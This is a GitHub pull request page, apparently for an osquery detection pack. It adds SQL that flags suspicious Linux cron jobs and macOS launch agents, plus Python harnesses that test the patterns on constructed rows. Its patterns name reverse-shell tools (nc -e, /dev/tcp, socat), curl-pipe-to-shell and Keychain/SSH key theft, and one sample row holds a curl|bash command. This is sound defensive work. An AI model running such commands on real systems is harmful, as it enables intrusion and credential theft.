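        WHEN li.is_lotl = 1 AND nw.is_non_whitelisted = 1
            THEN li.lotl_reason || ' + Not in known-good allowlist'
        WHEN li.is_lotl = 1 THEN li.lotl_reason
        ELSE 'Cron job not in known-good allowlist'
    END AS detection_reason
FROM crontab AS c
LEFT JOIN non_whitelisted AS nw ON c.command = nw.command AND c.path = nw.path
LEFT JOIN lotl_indicators AS li ON c.command = li.command AND c.path = li.path
WHERE nw.is_non_whitelisted = 1 OR li.is_lotl = 1
ORDER BY c.path
"""


def run_detection(rows=SAMPLE_CRONTAB):
    """Load rows into an in-memory SQLite crontab table and run DETECTION_SQL.

    Returns a list of (command, path, detection_method, detection_reason) ordered
    by crontab path. SQLite LIKE is case-insensitive for ASCII, so 'CURL' and
    'Exec' hit the same patterns as their lowercase forms.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE crontab (event TEXT, minute TEXT, hour TEXT, day_of_month TEXT,"
        " month TEXT, day_of_week TEXT, command TEXT, path TEXT)"
    )
    conn.executemany("INSERT INTO crontab VALUES (?,?,?,?,?,?,?,?)", rows)
    try:
        return conn.execute(DETECTION_SQL).fetchall()
    finally:
        conn.close()


def summarize(results):
    """Map crontab path -> detection_method: the compact view used when tuning the allowlist."""
    return {path: method for _, path, method, _ in results}


if __name__ == "__main__":
    for command, path, method, reason in run_detection():
        print(f"{method:34} {reason}\n    {path}: {command}")
```

Row 1 (logrotate) is absent from the output, row 4 (find -exec) appears as LOTL_INDICATOR despite being allowlisted, and row 5 appears as NON_WHITELISTED only, which is the triage split the detection_method column is meant to give.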

🍎 macOS - Launch Agent/Daemon Persistence Detection

Description

Detects suspicious macOS Launch Agents and Launch Daemons using a dual-detection approach: (1) Non-whitelisted launch agents/daemons not in known-good allowlist and (2) Living off the Land (LotL) attack indicators. Identifies both non-standard persistence mechanisms AND abuse of legitimate macOS/Unix tools (curl, osascript, bash -c, base64 -d, etc.) for persistence, privilege escalation, and lateral movement. Uses path-based and code signature whitelist filtering to auto-exclude legitimate Apple system agents/daemons and known-good third-party software, while flagging suspicious patterns and unsigned binaries. This query provides a live snapshot of currently configured launch agents/daemons (not historical event log data). Final filter ensures results contain either LotL indicators OR unsigned/non-Apple signed binaries.

Detection Focus:

  • Download utilities (curl, wget) abuse and download-and-pipe-to-shell patterns
  • Reverse shells via netcat, bash network redirection, socat
  • Execution from temporary/writable directories (/tmp, /var/tmp, Downloads, Desktop)
  • Base64 decode for obfuscation and encoded command execution
  • Shell command execution via -c flag and interactive shell invocation
  • One-liner execution (Python, Perl, Ruby, PHP) and AppleScript execution abuse
  • Persistent agents/daemons with auto-restart and periodic execution
  • SSH key access, Keychain credential access, and sudo without password prompt
  • Unsigned binaries or non-Apple signed executables (filtered in final WHERE clause)
  • MITRE ATT&CK: T1543.001 (Launch Agent), T1543.004 (Launch Daemon), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer), T1547.011 (Plist Modification)

Result

Screenshot 2025-11-21 at 17 32 04

Query results will show suspicious launch agents/daemons with dual classification: LOTL_INDICATOR for items exhibiting Living off the Land techniques, NON_WHITELISTED for items not matching known-good patterns, or both. Results are filtered to include only items with LotL indicators OR unsigned/non-Apple signed binaries. Results include launch item metadata (name, path, program, arguments, schedule, status), detection reasoning, code signature information, and file hashes for executable validation.

Platform

darwin

Interval

3600 seconds (1 hour)

Query ID

launchd_macos_elastic

ECS Field Mappings

  • event.category ← detection_method
  • rule.description ← detection_reason
  • rule.category ← type
  • event.outcome ← status
  • process.name ← name
  • process.executable ← program
  • process.command_line ← program_arguments
  • file.path ← program
  • file.hash.sha256 ← sha256
  • file.hash.sha1 ← sha1
  • file.hash.md5 ← md5
  • file.size ← size
  • file.mtime ← mtime
  • file.ctime ← ctime
  • file.directory ← directory
  • code_signature.signed ← signed
  • code_signature.subject_name ← identifier
  • user.name ← username
  • service.id ← name

SQL Query

-- Detects suspicious launch agents/daemons via whitelist and LotL patterns
-- MITRE: T1543.001, T1543.004, T1059.004, T1105, T1547.011
-- Final filter: LOTL OR unsigned OR non-Apple signed

WITH non_whitelisted AS (
    SELECT
        l.name,
        l.path,
        l.program,
        l.program_arguments,
        l.run_at_load,
        l.keep_alive,
        l.on_demand,
        l.disabled,
        l.username,
        l.groupname,
        l.stdout_path,
        l.stderr_path,
        l.start_interval,
        CASE
            WHEN l.disabled = 1 THEN 'disabled'
            WHEN l.run_at_load = 1 THEN 'enabled_run_at_load'
            ELSE 'enabled'
        END AS status,
        1 AS is_non_whitelisted,
        0 AS is_lotl
    FROM launchd AS l
    WHERE l.name IS NOT NULL
        AND l.name != ''
        AND l.program IS NOT NULL
        AND l.program != ''
        -- Whitelist: Apple system paths with com.apple naming
        AND NOT (
            (l.path LIKE '/System/Library/LaunchDaemons/com.apple.%'
                OR l.path LIKE '/System/Library/LaunchAgents/com.apple.%')
            AND l.name LIKE 'com.apple.%'
        )
        -- Whitelist: Apple Library paths
        AND NOT (
            l.path LIKE '/Library/Apple/%'
            AND l.name LIKE 'com.apple.%'
        )
        -- Whitelist: Known-good third-party vendors
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.google.%' OR l.path LIKE '/Library/LaunchDaemons/com.google.%')
            AND l.name LIKE 'com.google.%'
            AND (l.program LIKE '%Google%' OR l.program LIKE '%/Library/Application Support/Google/%')
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.microsoft.%' OR l.path LIKE '/Library/LaunchDaemons/com.microsoft.%')
            AND l.name LIKE 'com.microsoft.%'
            AND (l.program LIKE '%Microsoft%' OR l.program LIKE '%/Library/Application Support/Microsoft/%')
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.adobe.%' OR l.path LIKE '/Library/LaunchDaemons/com.adobe.%')
            AND l.name LIKE 'com.adobe.%'
            AND (l.program LIKE '%Adobe%' OR l.program LIKE '%/Library/Application Support/Adobe/%')
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.dropbox.%' OR l.path LIKE '/Library/LaunchDaemons/com.dropbox.%')
            AND l.name LIKE 'com.dropbox.%'
            AND l.program LIKE '%Dropbox%'
        )
        AND NOT (
            (l.path LIKE '/Library/LaunchDaemons/com.docker.%' OR l.path LIKE '/Library/LaunchAgents/com.docker.%')
            AND l.name LIKE 'com.docker.%'
            AND l.program LIKE '%Docker%'
        )
        -- Whitelist: Standard binary paths
        AND NOT (
            l.program LIKE '/usr/bin/%'
            OR l.program LIKE '/usr/sbin/%'
            OR l.program LIKE '/bin/%'
            OR l.program LIKE '/sbin/%'
        )
),
lotl_indicators AS (
    SELECT
        l.name,
        l.path,
        l.program,
        l.program_arguments,
        l.run_at_load,
        l.keep_alive,
        l.on_demand,
        l.disabled,
        l.username,
        l.groupname,
        l.stdout_path,
        l.stderr_path,
        l.start_interval,
        CASE
            WHEN l.disabled = 1 THEN 'disabled'
            WHEN l.run_at_load = 1 THEN 'enabled_run_at_load'
            ELSE 'enabled'
        END AS status,
        0 AS is_non_whitelisted,
        1 AS is_lotl,
        CASE
            -- Pipe-to-shell is checked before the generic download-utility branches; otherwise '%curl %' would claim every 'curl ... | bash' first
            WHEN l.program_arguments LIKE '%curl%|%bash%' OR l.program_arguments LIKE '%curl%|%sh%' THEN 'Download and pipe to shell (curl|bash)'
            WHEN l.program_arguments LIKE '%wget%|%bash%' OR l.program_arguments LIKE '%wget%|%sh%' THEN 'Download and pipe to shell (wget|sh)'
            WHEN l.program LIKE '%curl' OR l.program_arguments LIKE '%curl %' THEN 'Download utility (curl) abuse'
            WHEN l.program LIKE '%wget' OR l.program_arguments LIKE '%wget %' THEN 'Download utility (wget) abuse'
            WHEN l.program_arguments LIKE '%nc -e%' OR l.program_arguments LIKE '%ncat -e%' THEN 'Reverse shell via netcat'
            WHEN l.program_arguments LIKE '%/dev/tcp/%' OR l.program_arguments LIKE '%/dev/udp/%' THEN 'Bash network redirection (reverse shell)'
            WHEN l.program_arguments LIKE '%socat%TCP%' OR l.program_arguments LIKE '%socat%EXEC%' THEN 'Socat reverse shell'
            WHEN l.program LIKE '/tmp/%' OR l.program LIKE '/var/tmp/%' OR l.program LIKE '/private/tmp/%' OR l.program LIKE '/private/var/tmp/%' THEN 'Execution from temporary directory'
            -- SSH key paths always contain '/.', so this branch must precede the hidden-directory check to be reachable
            WHEN l.program_arguments LIKE '%/.ssh/authorized_keys%' OR l.program_arguments LIKE '%/.ssh/id_rsa%' OR l.program_arguments LIKE '%/.ssh/id_ed25519%' THEN 'SSH key access detected'
            -- SQL LIKE has no regex: a pattern such as '/Users/%/.*' only matches a literal ".*"; '%/.%' covers any dot-prefixed path segment
            WHEN l.program LIKE '%/.%' OR l.program_arguments LIKE '%/.%' THEN 'Execution from hidden directory'
            WHEN l.program LIKE '/Users/%/Downloads/%' THEN 'Execution from user Downloads folder'
            WHEN l.program LIKE '/Users/%/Desktop/%' THEN 'Execution from user Desktop'
            WHEN l.program_arguments LIKE '%base64 -d%' OR l.program_arguments LIKE '%base64 --decode%' OR l.program_arguments LIKE '%base64 -D%' THEN 'Base64 decode for obfuscation'
            WHEN l.program_arguments LIKE '%echo%|%base64%' THEN 'Base64 encoded command execution'
            WHEN l.program_arguments LIKE '%bash -c%' OR l.program_arguments LIKE '%sh -c%' OR l.program_arguments LIKE '%zsh -c%' THEN 'Shell command execution via -c flag'
            WHEN l.program_arguments LIKE '%bash -i%' OR l.program_arguments LIKE '%sh -i%' OR l.program_arguments LIKE '%zsh -i%' THEN 'Interactive shell invocation'
            WHEN l.program_arguments LIKE '%python -c%' OR l.program_arguments LIKE '%python3 -c%' THEN 'Python one-liner execution'
            WHEN l.program_arguments LIKE '%perl -e%' THEN 'Perl one-liner execution'
            WHEN l.program_arguments LIKE '%ruby -e%' THEN 'Ruby one-liner execution'
            WHEN l.program_arguments LIKE '%php -r%' THEN 'PHP one-liner execution'
            WHEN l.program LIKE '%osascript' AND l.program_arguments LIKE '%-e%' THEN 'AppleScript execution abuse (osascript -e)'
            WHEN l.program_arguments LIKE '%osascript%-%e%' THEN 'AppleScript inline execution'
            -- Structural indicators: RunAtLoad+KeepAlive and StartInterval are also common in legitimate agents, so these branches match broadly
            WHEN l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '%/Users/%/Library/LaunchAgents/%' THEN 'Persistent user-level agent with auto-restart'
            WHEN l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '/Library/LaunchDaemons/%' THEN 'Persistent system-level daemon with auto-restart'
            WHEN l.start_interval IS NOT NULL AND l.start_interval != '' AND l.path LIKE '%/Users/%/Library/LaunchAgents/%' THEN 'User-level periodic execution agent'
            WHEN l.stdout_path LIKE '%/.%' OR l.stderr_path LIKE '%/.%' THEN 'Output redirection to hidden file'
            WHEN l.program_arguments LIKE '%security%find-generic-password%' OR l.program_arguments LIKE '%security%dump-keychain%' THEN 'Keychain credential access'
            WHEN l.program_arguments LIKE '%sudo -n%' OR l.program_arguments LIKE '%sudo --non-interactive%' THEN 'Sudo without password prompt'
            WHEN l.program_arguments LIKE '%chmod +s%' OR l.program_arguments LIKE '%chmod 4755%' OR l.program_arguments LIKE '%chmod 4777%' THEN 'Setuid bit modification (privilege escalation)'
            WHEN l.program LIKE '%nc' OR l.program LIKE '%netcat' OR l.program LIKE '%ncat' OR l.program_arguments LIKE '%nc %' OR l.program_arguments LIKE '%netcat%' THEN 'Netcat network utility abuse'
            WHEN l.program LIKE '%socat' OR l.program_arguments LIKE '%socat%' THEN 'Socat network utility abuse'
            WHEN (
                l.program_arguments LIKE '% eval %'
                OR l.program_arguments LIKE '% eval(%'
                OR l.program_arguments LIKE '%|eval %'
                OR l.program_arguments LIKE '%;eval %'
                OR l.program_arguments LIKE '% exec %'
                OR l.program_arguments LIKE '%|exec %'
                OR l.program_arguments LIKE '%;exec %'
                OR (l.program LIKE '%/bash' AND l.program_arguments LIKE '%eval%')
                OR (l.program LIKE '%/sh' AND l.program_arguments LIKE '%eval%')
                OR (l.program LIKE '%/zsh' AND l.program_arguments LIKE '%eval%')
            ) AND l.program NOT LIKE '/usr/libexec/%' THEN 'Eval/exec command execution'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM launchd AS l
    WHERE l.name IS NOT NULL
        AND l.name != ''
        AND l.program IS NOT NULL
        AND l.program != ''
        AND (
            l.program LIKE '%curl'
            OR l.program LIKE '%wget'
            OR l.program_arguments LIKE '%curl %'
            OR l.program_arguments LIKE '%wget %'
            OR l.program_arguments LIKE '%curl%|%bash%'
            OR l.program_arguments LIKE '%curl%|%sh%'
            OR l.program_arguments LIKE '%wget%|%bash%'
            OR l.program_arguments LIKE '%wget%|%sh%'
            OR l.program_arguments LIKE '%nc -e%'
            OR l.program_arguments LIKE '%ncat -e%'
            OR l.program_arguments LIKE '%/dev/tcp/%'
            OR l.program_arguments LIKE '%/dev/udp/%'
            OR l.program_arguments LIKE '%socat%TCP%'
            OR l.program_arguments LIKE '%socat%EXEC%'
            OR l.program LIKE '/tmp/%'
            OR l.program LIKE '/var/tmp/%'
            OR l.program LIKE '/private/tmp/%'
            OR l.program LIKE '/private/var/tmp/%'
            -- '%/.%' already covers every dot-prefixed path segment (LIKE has no regex, so '/Users/%/.*' would never match)
            OR l.program LIKE '%/.%'
            OR l.program LIKE '/Users/%/Downloads/%'
            OR l.program LIKE '/Users/%/Desktop/%'
            OR l.program_arguments LIKE '%/.%'
            OR l.program_arguments LIKE '%base64 -d%'
            OR l.program_arguments LIKE '%base64 --decode%'
            OR l.program_arguments LIKE '%base64 -D%'
            OR l.program_arguments LIKE '%echo%|%base64%'
            OR l.program_arguments LIKE '%bash -c%'
            OR l.program_arguments LIKE '%sh -c%'
            OR l.program_arguments LIKE '%zsh -c%'
            OR l.program_arguments LIKE '%bash -i%'
            OR l.program_arguments LIKE '%sh -i%'
            OR l.program_arguments LIKE '%zsh -i%'
            OR l.program_arguments LIKE '%python -c%'
            OR l.program_arguments LIKE '%python3 -c%'
            OR l.program_arguments LIKE '%perl -e%'
            OR l.program_arguments LIKE '%ruby -e%'
            OR l.program_arguments LIKE '%php -r%'
            OR (l.program LIKE '%osascript' AND l.program_arguments LIKE '%-e%')
            OR l.program_arguments LIKE '%osascript%-%e%'
            OR (l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '%/Users/%/Library/LaunchAgents/%')
            OR (l.run_at_load = 1 AND l.keep_alive = 1 AND l.disabled = 0 AND l.path LIKE '/Library/LaunchDaemons/%')
            OR (l.start_interval IS NOT NULL AND l.start_interval != '' AND l.path LIKE '%/Users/%/Library/LaunchAgents/%')
            OR l.stdout_path LIKE '%/.%'
            OR l.stderr_path LIKE '%/.%'
            OR l.program_arguments LIKE '%/.ssh/authorized_keys%'
            OR l.program_arguments LIKE '%/.ssh/id_rsa%'
            OR l.program_arguments LIKE '%/.ssh/id_ed25519%'
            OR l.program_arguments LIKE '%security%find-generic-password%'
            OR l.program_arguments LIKE '%security%dump-keychain%'
            OR l.program_arguments LIKE '%sudo -n%'
            OR l.program_arguments LIKE '%sudo --non-interactive%'
            OR l.program_arguments LIKE '%chmod +s%'
            OR l.program_arguments LIKE '%chmod 4755%'
            OR l.program_arguments LIKE '%chmod 4777%'
            OR l.program LIKE '%nc'
            OR l.program LIKE '%netcat'
            OR l.program LIKE '%ncat'
            OR l.program_arguments LIKE '%nc %'
            OR l.program_arguments LIKE '%netcat%'
            OR l.program LIKE '%socat'
            OR l.program_arguments LIKE '%socat%'
            OR (
                (
                    l.program_arguments LIKE '% eval %'
                    OR l.program_arguments LIKE '% eval(%'
                    OR l.program_arguments LIKE '%|eval %'
                    OR l.program_arguments LIKE '%;eval %'
                    OR l.program_arguments LIKE '% exec %'
                    OR l.program_arguments LIKE '%|exec %'
                    OR l.program_arguments LIKE '%;exec %'
                    OR (l.program LIKE '%/bash' AND l.program_arguments LIKE '%eval%')
                    OR (l.program LIKE '%/sh' AND l.program_arguments LIKE '%eval%')
                    OR (l.program LIKE '%/zsh' AND l.program_arguments LIKE '%eval%')
                )
                AND l.program NOT LIKE '/usr/libexec/%'
            )
        )
),
combined AS (
    SELECT
        l.name,
        l.path,
        l.program,
        l.program_arguments,
        l.run_at_load,
        l.keep_alive,
        l.on_demand,
        l.disabled,
        l.username,
        l.groupname,
        l.stdout_path,
        l.stderr_path,
        l.start_interval,
        COALESCE(
            MAX(li.status),
            MAX(nw.status)
        ) AS status,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'Launch Agent/Daemon (LotL)'
            ELSE 'Launch Agent/Daemon'
        END AS type,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN 'LOTL_INDICATOR + NON_WHITELISTED'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'LOTL_INDICATOR'
            ELSE 'NON_WHITELISTED'
        END AS detection_method,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN MAX(li.lotl_reason) || ' + Not in known-good allowlist'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN MAX(li.lotl_reason)
            ELSE 'Launch agent/daemon not in known-good allowlist'
        END AS detection_reason
    FROM launchd AS l
    LEFT JOIN non_whitelisted AS nw ON l.name = nw.name AND l.path = nw.path AND l.program = nw.program
    LEFT JOIN lotl_indicators AS li ON l.name = li.name AND l.path = li.path AND l.program = li.program
    WHERE COALESCE(nw.is_non_whitelisted, 0) = 1 OR COALESCE(li.is_lotl, 0) = 1
    GROUP BY l.name, l.path, l.program, l.program_arguments, l.run_at_load, l.keep_alive, l.on_demand, l.disabled, l.username, l.groupname, l.stdout_path, l.stderr_path, l.start_interval
)
SELECT
    c.name,
    c.path,
    c.program,
    c.program_arguments,
    c.type,
    c.run_at_load,
    c.keep_alive,
    c.on_demand,
    c.disabled,
    c.status,
    c.username,
    c.groupname,
    c.stdout_path,
    c.stderr_path,
    c.start_interval,
    c.detection_method,
    c.detection_reason,
    s.signed,
    s.identifier,
    h.sha256,
    h.sha1,
    h.md5,
    f.size,
    f.mtime,
    f.ctime,
    f.directory
FROM combined AS c
LEFT JOIN signature AS s ON c.program = s.path
LEFT JOIN hash AS h ON c.program = h.path
LEFT JOIN file AS f ON c.program = f.path
WHERE (
    c.detection_method LIKE 'LOTL_INDICATOR%'
    OR s.signed IS NULL
    OR s.signed = 0
    OR (
        s.identifier IS NOT NULL
        AND s.identifier NOT LIKE 'com.apple.%'
        AND s.identifier NOT LIKE 'Apple Inc.%'
    )
)
ORDER BY
    CASE WHEN c.detection_method LIKE 'LOTL_INDICATOR%' THEN 0 ELSE 1 END,
    c.detection_reason,
    c.run_at_load DESC,
    c.keep_alive DESC,
    c.name

This PR was AI assisted with Claude Code
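The whitelist clauses and the LotL CASE in the query are plain SQLite LIKE patterns, which is also the engine osquery evaluates them with, so they can be exercised offline before the pack is rolled out. The block below is an added example, not code from this PR or from osquery: it loads a handful of constructed launchd rows (labels, paths and arguments are invented, the reason strings are the pack's own) into an in-memory SQLite table and runs a subset of the pack's whitelist clauses and CASE branches over them, with the pipe-to-shell branch ordered before the generic curl branch. Two tuning points fall out of it: a `/usr/bin/rsync` job is whitelisted yet still reported as a LotL hit because `rsync` ends in `nc`, and a pattern such as `'/Users/%/.*'` never matches a hidden directory because LIKE has no regex.

```python
"""Run the pack's launchd whitelist and LotL LIKE patterns against constructed rows.

osquery evaluates its SQL with SQLite, so Python's sqlite3 module reproduces
how each LIKE pattern behaves (case-insensitive for ASCII, no regex support).
"""
import sqlite3

# Constructed sample rows (not captured from any real host); columns mirror the
# launchd table fields the pack uses.
SAMPLE_ROWS = [
    # (name, path, program, program_arguments, run_at_load, keep_alive, disabled, start_interval)
    ("com.apple.mdworker.shared",
     "/System/Library/LaunchAgents/com.apple.mdworker.shared.plist",
     "/System/Library/Frameworks/Metadata.framework/Versions/A/Support/mdworker_shared",
     "", 1, 0, 0, ""),
    ("com.example.backup",                       # legitimate rsync job, whitelisted by /usr/bin/
     "/Library/LaunchAgents/com.example.backup.plist",
     "/usr/bin/rsync",
     "/usr/bin/rsync -a /Users/bob/Documents /Volumes/Backup", 1, 0, 0, ""),
    ("com.google.keystone.agent",                # vendor-looking label, program outside vendor path
     "/Library/LaunchAgents/com.google.keystone.agent.plist",
     "/Users/Shared/.cache/update",
     "/Users/Shared/.cache/update --quiet", 1, 1, 0, ""),
    ("com.example.updater",                      # curl | bash wrapped in a shell
     "/Users/bob/Library/LaunchAgents/com.example.updater.plist",
     "/bin/bash",
     "/bin/bash -c curl -fsSL https://updates.example.invalid/run.sh | bash", 1, 0, 0, ""),
]

# Subset of the pack's whitelist: Apple system items, one vendor, standard binary dirs.
WHITELISTED = """
    ((path LIKE '/System/Library/LaunchDaemons/com.apple.%'
      OR path LIKE '/System/Library/LaunchAgents/com.apple.%') AND name LIKE 'com.apple.%')
    OR ((path LIKE '/Library/LaunchAgents/com.google.%' OR path LIKE '/Library/LaunchDaemons/com.google.%')
        AND name LIKE 'com.google.%'
        AND (program LIKE '%Google%' OR program LIKE '%/Library/Application Support/Google/%'))
    OR program LIKE '/usr/bin/%' OR program LIKE '/usr/sbin/%'
    OR program LIKE '/bin/%' OR program LIKE '/sbin/%'
"""

# Subset of the pack's LotL branches; first match wins, as in a SQL CASE.
LOTL_RULES = [
    ("program_arguments LIKE '%curl%|%bash%' OR program_arguments LIKE '%curl%|%sh%'",
     "Download and pipe to shell (curl|bash)"),
    ("program LIKE '%curl' OR program_arguments LIKE '%curl %'", "Download utility (curl) abuse"),
    ("program LIKE '/tmp/%' OR program LIKE '/private/tmp/%'", "Execution from temporary directory"),
    ("program LIKE '%/.%' OR program_arguments LIKE '%/.%'", "Execution from hidden directory"),
    ("program_arguments LIKE '%bash -c%' OR program_arguments LIKE '%sh -c%'",
     "Shell command execution via -c flag"),
    ("run_at_load = 1 AND keep_alive = 1 AND disabled = 0 AND path LIKE '%/Users/%/Library/LaunchAgents/%'",
     "Persistent user-level agent with auto-restart"),
    ("program LIKE '%nc' OR program LIKE '%ncat' OR program_arguments LIKE '%nc %'",
     "Netcat network utility abuse"),
]


def sql_like(value, pattern):
    """Evaluate one LIKE exactly as SQLite (and therefore osquery) does."""
    conn = sqlite3.connect(":memory:")
    try:
        return bool(conn.execute("SELECT ? LIKE ?", (value, pattern)).fetchone()[0])
    finally:
        conn.close()


def classify(rows=SAMPLE_ROWS):
    """Return {name: (detection_method, detection_reason)} for rows the pack would report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE launchd (name, path, program, program_arguments,"
                 " run_at_load, keep_alive, disabled, start_interval)")
    conn.executemany("INSERT INTO launchd VALUES (?,?,?,?,?,?,?,?)", rows)
    branches = " ".join(f"WHEN {cond} THEN '{reason}'" for cond, reason in LOTL_RULES)
    query = (f"SELECT name, NOT ({WHITELISTED}) AS non_whitelisted,"
             f" CASE {branches} ELSE NULL END AS lotl_reason"
             " FROM launchd WHERE program IS NOT NULL AND program != ''")
    findings = {}
    for name, non_whitelisted, reason in conn.execute(query):
        if reason and non_whitelisted:
            findings[name] = ("LOTL_INDICATOR + NON_WHITELISTED", reason + " + Not in known-good allowlist")
        elif reason:
            findings[name] = ("LOTL_INDICATOR", reason)
        elif non_whitelisted:
            findings[name] = ("NON_WHITELISTED", "Launch agent/daemon not in known-good allowlist")
    conn.close()
    return findings


if __name__ == "__main__":
    for name, (method, reason) in classify().items():
        print(f"{name:32} {method:34} {reason}")
    # '/Users/%/.*' is not a regex, so it never matches a hidden directory; '%/.%' does
    print(sql_like("/Users/bob/.config/agent", "/Users/%/.*"),
          sql_like("/Users/bob/.config/agent", "/Users/%/.%"))
```

The Apple row is dropped (whitelisted, no LotL branch fires), the rsync job and the curl|bash agent come back as LOTL_INDICATOR even though both programs live in whitelisted directories, and the keystone-named item is flagged on both axes because its program path fails the vendor clause. Swapping in real rows from `osqueryi -A launchd --json` is the quickest way to see how much of a fleet the structural branches alone would surface.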

@tomsonpl tomsonpl marked this pull request as ready for review November 21, 2025 16:37
@tomsonpl tomsonpl requested a review from a team as a code owner November 21, 2025 16:37
@tomsonpl tomsonpl requested review from gergoabraham and paul-tavares and removed request for a team November 21, 2025 16:37
@elasticmachine

💚 Build Succeeded

@andrewkroh andrewkroh added documentation Improvements or additions to documentation. Applied to PRs that modify *.md files. Integration:osquery_manager Osquery Manager labels Nov 21, 2025